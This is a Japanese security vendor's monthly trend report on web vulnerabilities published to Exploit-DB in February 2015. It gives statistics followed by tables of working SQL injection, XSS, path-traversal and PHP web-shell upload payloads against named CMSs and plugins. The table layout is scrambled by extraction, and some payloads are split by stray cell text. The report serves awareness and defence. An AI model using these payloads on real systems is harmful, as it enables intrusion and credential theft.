2015.02 EDB-Report 最新Web脆弱性トレンドレポート(2015.02) 2015.02.01~2015.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 2015年2月は、Exploit-DBの分析結果をみると、前月の1月と同じく、SQLインジェクション(SQL Injection)とクロス・サイト・スクリプティング(Cross Site Scripting:XSS)の攻撃による脆弱性が最も多く報告さ れました。今月は、ここ6か月間で、脆弱性の報告件数が最も多く、また、危険度が非常に高い脆弱性も多かったことが大きな特徴です。注目すべきなのは、脆弱性の約60%は攻撃実行の難易度が易しいレベルで あるものの、約65%は危険度が非常に高いものであったことです。そのため、報告件数の最も多いSQLインジェクション(SQL Injection)とクロス・サイト・スクリプティング(Cross Site Scripting:XSS)の攻撃に対して は、特別な注意が求められます。一方、主なソフトウェア別脆弱性発生件数の場合、脆弱性の報告件数が最も多かったのは、オープンソースCMSのutCMSとWeb基盤PHP Troubleshooting Toolの PHPBugTrackerであり、その種類も多様でした。小規模で軽量サイトの制作に適したCMSであるutCMSは、今月初めて脆弱性が報告されましたが、そのCMSをご利用であれば、セキュリティパッチを最新状態に更 新し、脆弱性にさらされないように万全を期す必要があります。 1. 脆弱性別件数 脆弱性カテゴリ SQL インジェクション (SQL Injection) クロス サイト スクリプティング (Cross Site Scripting:XSS) ローカルファイル挿入 (Local File Inclusion:LFI) ファイルアップロード (File Upload) 合計 脆弱性別件数 31 件数 35 30 24 31 25 20 24 15 6 10 6 1 5 1 0 62 SQL インジェクション クロス サイト スクリプ ローカルファイル挿入 (SQL Injection) ティング (Local File (Cross Site Inclusion:LFI) ファイルアップロード (File Upload) Scripting:XSS) 危険度別分類 2. 危険度別件数 危険度 件数 割合 早急対応要 40 65% 高 22 35% 中 0 0% 合計 62 100% 0 22 早急対応要 高 中 40 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 1 2% 中 24 39% 易 37 60% 合計 62 100% 攻撃実行の難易度別件数 1 24 難 中 易 37 4. 主なソフトウェア別脆弱性発生件数 主なソフトウェア別脆弱性発生件数 件数 u5CMS phpBugTracker Wordpress Magento Server Zeuscart Piwigo eTouch SamePage WeBid StaMPi Sefrengo Redaxscript Pragyan Pandora IBM Endpoint Manager Fork Exponent Clipbucket Chamilo BeehiveForum 17 17 7 3 2 2 2 1 1 1 1 1 1 1 1 1 1 1 1 合計 62 18 17 17 u5CMS 16 phpBugTracker 14 Wordpress Magento Server 12 Zeuscart 10 8 Piwigo eTouch SamePage 7 WeBid 6 4 StaMPi Sefrengo 3 Redaxscript 2 2 2 2 1 1 1 1 1 1 1 1 1 1 1 1 Pragyan Pandora 0 u5CMS phpBugTracker Wordpress Magento Server Zeuscart Piwigo eTouch SamePage WeBid StaMPi Sefrengo Redaxscript Pragyan Pandora IBM Endpoint Manager Fork Exponent Clipbucket Chamilo BeehiveForum ソフトウェア名 Copyright 2015 Penta Security Systems Inc. All rights reserved IBM Endpoint Manager Fork Exponent Clipbucket Chamilo EDB-Report 最新Web脆弱性トレンドレポート(2015.02) 2015.02.01~2015.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 危険度分類基準 早急対応要:攻撃が成功した場合システムへ侵入可 高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす 中:情報漏洩 攻撃実行難易度分類基準 難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得 するため、高度な攻撃コードを採用したパターン、知らされていない攻撃 コードを採用したパターンのいずれかに該当する 中:攻撃手法自体は難しくないが、迂回コードを採用したパターン 易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、 既知の攻撃コードを採用したパターンのいずれかに該当する ** 5件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号 攻撃難易度 危険度 脆弱性名 ソフトウェア名 XSS XSS XSS XSS XSS XSS XSS XSS LFI Injection Injection Injection Injection Injection Injection Injection LFI Injection XSS XSS XSS Injection Injection XSS Injection Injection XSS Injection Injection XSS Injection XSS Injection Injection 易 易 易 易 易 易 易 易 易 易 易 易 易 易 易 易 易 中 易 中 中 中 中 中 中 中 中 中 中 中 中 中 中 中 高 高 高 高 高 高 高 高 高 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 高 高 高 高 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 早急対応要 U5cms U5cms U5cms U5cms U5cms U5cms U5cms U5cms U5cms U5cms U5cms U5cms U5cms U5cms U5cms U5cms U5cms phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker phpBugTracker 36039 LFI 易 早急対応要 36054 36058 SQL Injection SQL Injection 中 易 早急対応要 早急対応要 36061 SQL Injection 難 早急対応要 36086 SQL Injection 中 早急対応要 36086 36097 XSS XSS 易 易 早急対応要 早急対応要 u5CMS 3.9.3 - index.php XSS 脆弱性 u5CMS 3.9.3 - copy.php XSS 脆弱性 u5CMS 3.9.3 - delete.php XSS 脆弱性 u5CMS 3.9.3 - done.php XSS 脆弱性 u5CMS 3.9.3 - editor.php XSS 脆弱性 u5CMS 3.9.3 - notdone.php XSS 脆弱性 u5CMS 3.9.3 - sendfile.php XSS 脆弱性 u5CMS 3.9.3 - characters.php XSS 脆弱性 u5CMS 3.9.3 - thumb.php LFI 脆弱性 u5CMS 3.9.3 - copy2.php SQL Injection 脆弱性 u5CMS 3.9.3 - localize.php SQL Injection 脆弱性 u5CMS 3.9.3 - meta2.php SQL Injection 脆弱性 u5CMS 3.9.3 - metai.php SQL Injection 脆弱性 u5CMS 3.9.3 - nc.php SQL Injection 脆弱性 u5CMS 3.9.3 - new2.php SQL Injection 脆弱性 u5CMS 3.9.3 - rename2.php SQL Injection 脆弱性 u5CMS 3.9.3 - deletefile.php LFI 脆弱性 phpBugTracker 1.6.0 - project.php SQL Injection 脆弱性 phpBugTracker 1.6.0 - project.php XSS 脆弱性 phpBugTracker 1.6.0 - user.php XSS 脆弱性 phpBugTracker 1.6.0 - group.php XSS 脆弱性 phpBugTracker 1.6.0 - group.php SQL Injection 脆弱性 phpBugTracker 1.6.0 - status.php SQL Injection 脆弱性 phpBugTracker 1.6.0 - status.php XSS 脆弱性 phpBugTracker 1.6.0 - resolution.php SQL Injection 脆弱性 phpBugTracker 1.6.0 - severity.php SQL Injection 脆弱性 phpBugTracker 1.6.0 - severity.php XSS 脆弱性 phpBugTracker 1.6.0 - priority.php SQL Injection 脆弱性 phpBugTracker 1.6.0 - os.php SQL Injection 脆弱性 phpBugTracker 1.6.0 - os.php XSS 脆弱性 phpBugTracker 1.6.0 - database.php SQL Injection 脆弱性 phpBugTracker 1.6.0 - database.php XSS 脆弱性 phpBugTracker 1.6.0 - site.php SQL Injection 脆弱性 phpBugTracker 1.6.0 - bug.php SQL Injection 脆弱性 Wordpress Theme Divi Arbitrary - admin-ajax.php Local File Inclusion Vulnerability 脆弱性 Wordpress Survey and poll - SQL Injection 脆弱性 Wordpress Video Gallery 2.7.0 - SQL Injection 脆弱性 WordPress Webdorado Spider Event Calendar 1.4.9 - adminajax.php SQL Injection 脆弱性 WonderPlugin Audio Player 2.0 - admin-ajax.php SQL Injection 脆 弱性 WonderPlugin Audio Player 2.0 - admin-ajax.php XSS 脆弱性 WordPress Fancybox 3.0.2 - fancybox.php XSS 脆弱性 36029 36029 36029 36029 36029 36029 36029 36029 36028 36027 36027 36027 36027 36027 36027 36027 36026 36160 36160 36160 36160 36160 36160 36160 36160 36160 36160 36160 36160 36160 36160 36160 36160 36160 脆弱性カテゴリ SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL SQL Copyright 2015 Penta Security Systems Inc. All rights reserved Wordpress Wordpress Wordpress Wordpress Wordpress Wordpress Wordpress EDB-Report 最新Web脆弱性トレンドレポート(2015.02) 2015.02.01~2015.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2015-02-02 EDB番号 35972 脆弱性カテゴリ SQL Injection 攻撃難易度 易 2015-02-04 35991 SQL Injection 易 2015-02-05 35996 LFI 易 2015-02-05 35996 XSS 易 2015-02-05 35996 XSS 易 2015-02-09 36039 LFI 易 2015-02-09 36031 LFI 易 2015-02-09 36029 XSS 易 2015-02-09 36029 XSS 易 2015-02-09 36029 XSS 易 2015-02-09 36029 XSS 易 2015-02-09 36029 XSS 易 2015-02-09 36029 XSS 易 2015-02-09 36029 XSS 易 2015-02-09 36029 XSS 易 2015-02-09 36028 LFI 易 2015-02-09 36027 SQL Injection 易 2015-02-09 36027 SQL Injection 易 2015-02-09 36027 SQL Injection 易 2015-02-09 36027 SQL Injection 易 2015-02-09 36027 SQL Injection 易 2015-02-09 2015-02-09 2015-02-09 36027 36027 36026 SQL Injection SQL Injection LFI 易 危険度 脆弱性名 Sefrengo CMS 1.6.1 早急対応要 main.php SQL Injection 脆弱 性 Pragyan CMS 3.0 - SQL Injection 脆弱性 Magento Server MAGMI 高 Plugin - ajax_pluginconf.php LFI 脆弱性 Magento Server MAGMI 高 Plugin - magmi.php XSS 脆弱 性 Magento Server MAGMI Plugin 高 magmi_import_run.php XSS 脆弱性 Wordpress Theme Divi Arbitrary - admin-ajax.php 早急対応要 Local File Inclusion Vulnerability 脆弱性 StaMPi - fotogalerie.php Local 高 File Inclusion 脆弱性 u5CMS 3.9.3 - index.php XSS 高 脆弱性 u5CMS 3.9.3 - copy.php XSS 高 脆弱性 u5CMS 3.9.3 - delete.php 高 XSS 脆弱性 u5CMS 3.9.3 - done.php XSS 高 脆弱性 早急対応要 高 攻撃コード POST /sefrengo/backend/main.php HTTP/1.1 Host: research-itasvn.rhcloud.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0. 9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: browserspy_js=1; sefrengo=8167bb07461d09b026b28179f7863562 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 112 u5CMS 3.9.3 - localize.php SQL Injection 脆弱性 u5CMS 3.9.3 - meta2.php 早急対応要 SQL Injection 脆弱性 u5CMS 3.9.3 - metai.php SQL 早急対応要 Injection 脆弱性 u5CMS 3.9.3 - nc.php SQL 早急対応要 Injection 脆弱性 /wp-admin/adminajax.php?action=revslider_show_image&img=../wpconfig.php /path/fotogalerie.php?id=../../../../../../../../../../etc/ passwd%00 /u5cms/index.php?c=start"><script>alert(1)</script >&l=e&p=1&r= /u5cms/u5admin/copy.php?name=album"><img%20 src%3da%20onerror%3dalert(7)> /u5cms/u5admin/delete.php?name=a"><img%20src %3da%20onerror%3dalert(8)> /u5cms/u5admin/done.php?n=inserted%20test"><sc ript>alert(11)</script> 易 易 u5CMS 3.9.3 - deletefile.php 早急対応要 LFI 脆弱性 Wordpress Wordpress Theme Divi Arbitrary StaMPi StaMPi u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 u5CMS u5CMS 3.9.3 name=album' and '2'='1 /u5cms/u5admin/editor.php?c=start' and '2'='1 /u5cms/u5admin/localize.php?name=album' and '2'='1 /u5cms/u5admin/metai.php?typ=a&name=album' and '2' = '1 /u5cms/u5admin/nc.php?name=o' and '2'='1 POST /u5cms/u5admin/new2.php?name=album HTTP/1.1 Host: Connection: Close Accept: text/html, application/xhtml+xml, */* u5CMS 3.9.3 - new2.php SQL 早急対応要 Accept-Language: ko-KR Injection 脆弱性 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: application/x-www-form-urlencoded u5CMS 3.9.3 - rename2.php 早急対応要 SQL Injection 脆弱性 Sefrengo CMS 1.6.1 /magmi/web/magmi_import_run.php?</script><scrip Magento Server t>alert('XSS');</script> Magento Server MAGMI Plugin - notdone.php 早急対応要 Sefrengo Magento Server /magmi/web/magmi.php?configstep=2&profile=</script><script>alert('XSS');</script> Magento Server MAGMI Plugin u5CMS 3.9.3 - editor.php XSS /u5cms/u5admin/editor.php?c=c"><script>alert(12) 脆弱性 </script> u5CMS 3.9.3 XSS 脆弱性 u5CMS 3.9.3 XSS 脆弱性 u5CMS 3.9.3 XSS 脆弱性 u5CMS 3.9.3 脆弱性 対象環境 value_to_save=45&sefrengo=8167bb07461d09b026b 28179f7863562&area=settings&action=save_value&v /user:1%27+and+1=2+union+select+database%28 Pragyan CMS Pragyan %29,version%28%29,3+--+ 3.0 /magmi/web/ajax_pluginconf.php?file=../../../../../../. Magento Server ./../../../../etc/passwd&plugintype=utilities&pluginclas Magento Server MAGMI Plugin s=CustomSQLUtility /u5cms/u5admin/notdone.php?n=wrong%20name,% 20not%20deleted%20<script>alert(14)</script> - sendfile.php /u5cms/u5admin/sendfile.php?name=shortreference& 高 l=_frd"><script>alert(16)</script>&typ=d - characters.php /u5cms/u5admin/characters.php?more=335&s=335" 高 ><script>alert(17)</script> - thumb.php LFI /u5cms/thumb.php?w=100&f=../../../../../../../../../.. 高 /etc/passwd%00 POST /u5cms/u5admin/copy2.php?name=album HTTP/1.1 Host: Connection: Close Accept: text/html, application/xhtml+xml, */* u5CMS 3.9.3 - copy2.php 早急対応要 Accept-Language: ko-KR SQL Injection 脆弱性 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type:application/x-www-form-urlencoded 高 対象プログラム name=test' and '2'='1 "&typ=e GET /u5cms/u5admin/rename2.php?name=valbum&newn ame=valbum2' and '2'='1&typ=a /u5cms/u5admin/deletefile.php?typ=d&name=shortre ference&f=../../../../../../deleteme.txt Copyright 2015 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2015.02) 2015.02.01~2015.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2015-02-09 EDB番号 36023 脆弱性カテゴリ SQL Injection 攻撃難易度 易 危険度 脆弱性名 攻撃コード POST /redaxscript/ HTTP/1.1 Host: target.local User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0. 9,*/*;q=0.8 Redaxscript CMS 2.2.0 Accept-Language: en-US,en;q=0.5 早急対応要 search.php SQL Injection 脆弱 Accept-Encoding: gzip, deflate 性 Cookie: PHPSESSID=khtnnm1tvvk3s12if0no367872; GEAR=local-5422433b500446ead50002d4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 96 Fork CMS 3.8.5 - form SQL Injection 脆弱性 2015-02-09 36041 SQL Injection 易 早急対応要 2015-02-09 36040 SQL Injection 中 Chamilo LMS 1.9.8 早急対応要 m_category.php SQL Injection 脆弱性 高 search_terms=test' or '1'='1&search_post=&token=24bcb285bc6f5c93203e /private/en/locale/index?form=filter&form_token=68a a8d273e0bd95a70e67372841603d5&application=&m odule=&type[]=act'+(select * from (select(sleep(10)))a)+'&type[]=err&type[]=lbl&type[] =msg&language[]=en&name=&value= /chamilourl/main/reservation/m_category.php?action=delete& id=0 UNION (SELECT IF(substr(password,1,1) = CHAR(100), SLEEP(5), 0) FROM user WHERE user_id = 1) /cgi-bin/bfenterprise/BESGatherMirrorNew.exe/IBM Endpoint Manager - XSS gatherversion?Body=GatherSpecifiedVersion&version 脆弱性 =1&url=http://"><script>alert(/XSS/)</script>&vers ion=1&useCRC=0 2015-02-11 36057 XSS 易 2015-02-11 36055 SQL Injection 易 Pandora FMS 5.1 SP1 早急対応要 index.php SQL Injection 脆弱 性 2015-02-11 36054 SQL Injection 中 Wordpress Survey and poll 早急対応要 SQL Injection 脆弱性 2015-02-12 36058 SQL Injection 易 早急対応要 2015-02-12 36509 XSS 易 2015-02-13 36061 SQL Injection 難 2015-02-16 36086 SQL Injection 中 /pandora/index.php?extension_in_menu=estado&sec =extensions&sec2=extensions/agents_modules&refr= &offset=-1' and '2'='1'-/wp-admin/adminajax.php?action=ajax_survey&sspcmd=save&survey_i d= 3556498 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>75 /wp-admin/adminajax.php%3Faction=rss&type=video&vid=1%20and% 201=1 対象プログラム 対象環境 Redaxscript Redaxscript CMS 2.2.0 Fork Fork CMS 3.8.5 Chamilo Chamilo LMS 1.9.8 IBM Endpoint Manager IBM Endpoint Manager 9.1.x versions earlier than 9.1.1229又 は9.2.x versions earlier than 9.2.1.48 Pandora Pandora FMS 5.1 SP1 Wordpress Wordpress Survey and poll Wordpress Video Gallery 2.7.0 Exponent CMS 2.3.1 - XSS 脆 Exponent CMS /news/show/title/"><script>alert(7)</script>time-for-a-heavy-harvest-new-release/src/@rand 早急対応要 Exponent 弱性 2.3.1 /wp-admin/adminajax.php?action=spiderbigcalendar_month&theme_id =13&calendar=1&select=month,list,week,day,&date= 201502&many_sp_calendar=1&cur_page_url=%s&cat_id= 1)%%20UNION%%20SELECT%%20%s,1,%%20FRO WordPress Webdorado Spider WordPress M_UNIXTIME(1423004400),1,(SELECT%%20CONCAT Event Calendar 1.4.9 Webdorado 早急対応要 (CHAR(35,35,35,35),table_name,CHAR(35,35,35,35) Wordpress admin-ajax.php SQL Injection Spider Event )%%20FROM%%20information_schema.tables%%20 脆弱性 Calendar 1.4.9 WHERE%%20table_name%%20LIKE%%20(%%20SE LECT%%20CHAR(37,%%20117,%%20115,%%2010 1,%%20114,%%20115)%%20)%%20LIMIT%%201) ,1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%2 0114,%%20101,%%20112,%%20101,%%2097,%% 20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;-POST /wp-admin/adminajax.php?action=wonderplugin_audio_save_item HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko WonderPlugin Audio Player Wordpress Chrome/16.0.912.75 Safari/535.7 早急対応要 2.0 - admin-ajax.php SQL Wordpress WonderPlugin Accept: */* Injection 脆弱性 Audio Player 2.0 Content-Type: application/x-www-form-urlencoded charset=UTF-8 Wordpress Video Gallery 2.7.0 - SQL Injection 脆弱性 Wordpress item[id]=1 UNION (SELECT 1, 2, 3, 4, IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM /wp-admin/admin`wp_users` WHERE ID = 1) POST 2015-02-16 36086 XSS 易 WonderPlugin Audio Player 早急対応要 2.0 - admin-ajax.php XSS 脆 弱性 ajax.php?action=wonderplugin_audio_save_item HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 item[id]=<script>alert(String.fromCharCode(88,83,8 3));</script>&item[customcss]=</style><script>aler t(String.fromCharCode(88,83,83));</script> Copyright 2015 Penta Security Systems Inc. All rights reserved Wordpress Wordpress WonderPlugin Audio Player 2.0 EDB-Report 最新Web脆弱性トレンドレポート(2015.02) 2015.02.01~2015.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難易度 2015-02-16 36089 SQL Injection 中 2015-02-16 36089 LFI 易 2015-02-16 36097 XSS 易 2015-02-19 36127 XSS 中 2015-02-19 36127 SQL Injection 中 2015-02-23 2015-02-23 36154 36155 XSS File Upload 易 易 危険度 脆弱性名 eTouch SamePage 早急対応要 v4.4.0.0.239 - SQL Injection 脆弱性 攻撃コード 対象プログラム /cm/blogrss/feed?entity=mostviewedpost&analyticsTy pe=blog&catId=-1) AND 6412=BENCHMARK(10000000,MD5(0x73764b7a)) AND (3198=3198&count=10&et_cw=850&et_ch=600 eTouch SamePage eTouch SamePage v4.4.0.0.239 eTouch SamePage eTouch SamePage v4.4.0.0.239 WordPress WordPress Fancybox 3.0.2 eTouch SamePage /cm/newui/blog/export.jsp?filepath=../conf/Catalina/l v4.4.0.0.239 - export.jsp LFI ocalhost/cm.xml&start=true&et_cw=350&et_ch=100 脆弱性 POST /wp-admin/admin-ajax.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 WordPress Fancybox 3.0.2 早急対応要 Accept: */* fancybox.php XSS 脆弱性 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 高 action=update&mfbfw[padding]=</script><script>al ert('xss')</script> /admin.php?page=plugin-AdminTools<img src=n Piwigo 2.7.3 - admin.php XSS onerror=eval(String.fromCharCode(97,108,101,114,1 早急対応要 脆弱性 16,40,100,111,99,117,109,101,110,116,46,99,111,1 11,107,105,101,41,59)) > POST /piwigo/admin.php?page=history HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Piwigo 2.7.3 - admin.php SQL Accept-Encoding: gzip, deflate 早急対応要 Injection 脆弱性 Cookie: pwg_display_thumbnail=no_display_thumbnail; Content-Type: application/x-www-form-urlencoded Content-Length: 255 高 早急対応要 Beehive Forum 1.4.4 edit_refs.php XSS 脆弱性 WeBid 1.1.1 - ajax.php File Upload 脆弱性 start=2015-01-08 &end=2015-01-09 &types[]=none&types[]=picture&types[]=high&types []=other&user=2) AND 1=2 UNION SELECT POST /edit_prefs.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 対象環境 Piwigo Piwigo 2.7.3 Piwigo Piwigo 2.7.3 BeehiveForum BeehiveForum 1.4.4 WeBid WeBid 1.1.1 Clipbucket Clipbucket 2.7 RC3 0.9 webtag=DEFAULT&nickname=test&email=test&firstn ame=test&lastname=test&dob_day=3&dob_month=3 &dob_year=1989&homepage_url=<script>alert(1);< /script>&homepage_url_global=Y&pic_url=<script>al ert(1);</script>&pic_url_global=Y&avatar_url=<scrip t>alert(1);</script>&avatar_url_global=Y&save=Sav POST /ajax.php?do=uploadaucimages HTTP/1.1 Host: Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------------------7dd10029908f2 -----------------------------7dd10029908f2 Content-Disposition: form-data; name="Filedata"; filename="shell.php" Content-Type: application/octet-stream 2015-02-23 36156 SQL Injection 易 2015-02-23 36159 XSS 中 2015-02-23 36159 SQL Injection 中 2015-02-23 36160 SQL Injection 中 高 Clipbucket 2.7 RC3 0.9 view_item.php SQL Injection 脆弱性 <?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));? > /clipbucket/view_item.php?item=a%27%20or%20%2 7a%27=%27a&type=photos&collection=9 /index.php?do=search&search=%22%3E%3Cbody%2 Zeuscart v.4 - index.php XSS Zeuscart 0onload=eval%28alert%28document.cookie%29%29 脆弱性 %20%3E%3C!-/admin/?do=disporders&action=detail&id=1+and+1= 2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 Zeuscart v.4 - /admin SQL 早急対応要 Zeuscart ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 Injection 脆弱性 2,database%28%29,34,35,version%28%29,37,38+-+ phpBugTracker 1.6.0 /admin/project.php?op=edit_component&id=1%27+a 早急対応要 project.php SQL Injection 脆 nd+1=2+union+select+1,2,database%28%29,user% phpBugTracker 弱性 28%29,5,6,version%28%29,8,9,10,11,12+--+ 高 Copyright 2015 Penta Security Systems Inc. All rights reserved Zeuscart v.4 Zeuscart v.4 phpBugTracker 1.6.0 EDB-Report 最新Web脆弱性トレンドレポート(2015.02) 2015.02.01~2015.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 2015-02-23 36160 XSS 易 高 phpBugTracker 1.6.0 project.php XSS 脆弱性 2015-02-23 36160 XSS 中 高 phpBugTracker 1.6.0 user.php XSS 脆弱性 2015-02-23 36160 XSS 中 高 phpBugTracker 1.6.0 group.php XSS 脆弱性 2015-02-23 36160 SQL Injection 中 2015-02-23 36160 SQL Injection 中 2015-02-23 36160 XSS 中 2015-02-23 36160 SQL Injection 中 2015-02-23 36160 SQL Injection 中 2015-02-23 36160 XSS 中 早急対応要 2015-02-23 36160 SQL Injection 中 phpBugTracker 1.6.0 早急対応要 priority.php SQL Injection 脆 弱性 2015-02-23 36160 SQL Injection 中 早急対応要 phpBugTracker 1.6.0 os.php SQL Injection 脆弱性 2015-02-23 36160 XSS 中 早急対応要 phpBugTracker 1.6.0 os.php XSS 脆弱性 2015-02-23 36160 SQL Injection 中 phpBugTracker 1.6.0 早急対応要 database.php SQL Injection 脆弱性 2015-02-23 36160 XSS 中 早急対応要 phpBugTracker 1.6.0 database.php XSS 脆弱性 2015-02-23 36160 SQL Injection 中 早急対応要 Name=<script>alert(1);</script> phpBugTracker 1.6.0 /admin/site.php?op=edit&site_id=5%27+and+1=2+u phpBugTracker site.php SQL Injection 脆弱性 nion+select+1,version%28%29,database%28%29 phpBugTracker 1.6.0 2015-02-23 36160 SQL Injection 中 早急対応要 phpBugTracker 1.6.0 /bug.php?op=add&project=1%27+and+1=2+union+ bug.php SQL Injection 脆弱性 select+user%28%29 phpBugTracker 1.6.0 phpBugTracker 1.6.0 group.php SQL Injection 脆弱 性 phpBugTracker 1.6.0 早急対応要 status.php SQL Injection 脆弱 性 高 早急対応要 phpBugTracker 1.6.0 status.php XSS 脆弱性 phpBugTracker 1.6.0 早急対応要 resolution.php SQL Injection 脆弱性 phpBugTracker 1.6.0 早急対応要 severity.php SQL Injection 脆 弱性 phpBugTracker 1.6.0 severity.php XSS 脆弱性 攻撃コード POST /admin/project.php?op=add HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 対象プログラム 対象環境 phpBugTracker phpBugTracker 1.6.0 project_name=<script>alert(1);</script> /admin/user.php?op=edit&use_js=1%22%3E%3Cscri phpBugTracker pt%3Ealert%28document.cookie%29%3C/script%3E &user_id=1 /admin/group.php?op=edit&use_js=1%22%3E%3Csc ript%3Ealert%28document.cookie%29%3C/script%3E phpBugTracker &group_id=1 /admin/group.php?op=edit&use_js=1&group_id=1+a nd+SLEEP%2810%29 phpBugTracker /admin/status.php?op=edit&status_id=1%27+and+1 =2+union+select+1,user%28%29,database%28%29, phpBugTracker version%28%29,5 POST /admin/status.php?op=edit&use_js=1&status_id=0 HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko phpBugTracker Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Description=<script>alert(1);</script> /admin/resolution.php?op=edit&resolution_id=1%27 phpBugTracker +and+1=2+union+select+1,user%28%29,database %28%29,version%28%29 /admin/severity.php?op=edit&severity_id=1%27+and +1=2+union+select+1,user%28%29,database%28% phpBugTracker 29,version%28%29,5 POST /admin/severity.php?op=edit&use_js=1&severity_id= 0 HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko phpBugTracker Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Description=<script>alert(1);</script> /admin/priority.php?op=edit&priority_id=1%27+and +1=2+union+select+1,user%28%29,database%28% 29,4,version%28%29+--+ /admin/os.php?op=edit&os_id=1%27+and+1=2+uni on+select+1,user%28%29,database%28%29,version %28%29+--+ POST /admin/os.php?op=edit&use_js=1&os_id=0 HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 phpBugTracker 1.6.0 phpBugTracker 1.6.0 phpBugTracker 1.6.0 phpBugTracker 1.6.0 phpBugTracker 1.6.0 phpBugTracker 1.6.0 phpBugTracker 1.6.0 phpBugTracker phpBugTracker 1.6.0 phpBugTracker phpBugTracker 1.6.0 phpBugTracker phpBugTracker 1.6.0 Regex=<script>alert(1);</script> /admin/database.php?op=edit&database_id=1%27+a phpBugTracker nd+1=2+union+select+1,user%28%29,version%28 %29 POST 